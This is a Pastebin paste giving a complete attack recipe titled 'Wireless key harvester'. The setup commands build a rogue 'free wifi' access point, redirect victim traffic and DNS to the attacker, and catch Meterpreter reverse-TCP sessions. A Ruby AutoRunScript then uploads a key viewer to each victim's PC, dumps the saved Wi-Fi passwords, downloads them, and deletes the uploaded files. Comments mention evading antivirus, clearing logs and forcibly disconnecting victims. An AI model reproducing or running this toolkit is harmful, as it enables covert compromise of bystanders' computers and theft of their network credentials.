Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wireless key harvester
- First we create our meterpreter exe
- check this page out
- http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
- setup our listener
- ./msfconsole
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 10.0.0.1
- set LPORT 55555
- set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb
- set ExitOnSession false
- show options
- exploit -j
- next setup our fake access point
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v
- no we setup our dhcp server
- ifconfig at0 up
- ifconfig lo up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
- iptables -P FORWARD ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- /etc/init.d/dhcp3-server restart
- setup apache server to host our exploit
- /etc/init.d/lighttpd stop
- lighttpd -D -f '/home/hm/Desktop/http/http'
- dns redirector -- in this case dnspoison
- cd dnspoison
- java ServerKernelMain 10.0.0.1 10.0.0.1
- and thats it, wait for victims to connect, or forcefully disconnect them using mdk!!!!!!
- --------------------------- harvester.rb ---------------------------------------
- #
- # Wireless key harvester using wireless key viewer"
- require 'rex'
- # Extract the host and port
- host,port = session.tunnel_peer.split(':')
- print_status("New session found on #{host}:#{port}...")
- # bin -- the name of our exe
- bin = "wkv.exe"
- # output of wireless key viewer
- out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
- #destination for the keys in txt format
- dest = "/home/hm/Desktop/keys/"
- #upload wireless key viewer --- modify it to bypass av's
- print_status("Uploading Wireless Key Viewer")
- sleep(1)
- client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
- sleep(1)
- print_status("Uploaded Wireless Key Viewer")
- sleep(1)
- #execute via cmd, output will be random name,
- print_status("Executing wireless key viewer ")
- client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
- print_status("bat file executed")
- sleep(1)
- #download keys to our keys folder
- print_status("Downloading keys to keys folder ")
- client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
- print_status("Downloaded keys to keys folder ")
- #delete uploaded files -- we can also clear logs here if we want to
- sleep(1)
- print_status("Deleting uploaded files ")
- client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
- client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
- print_status("Have a nice day!!!!!! ")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement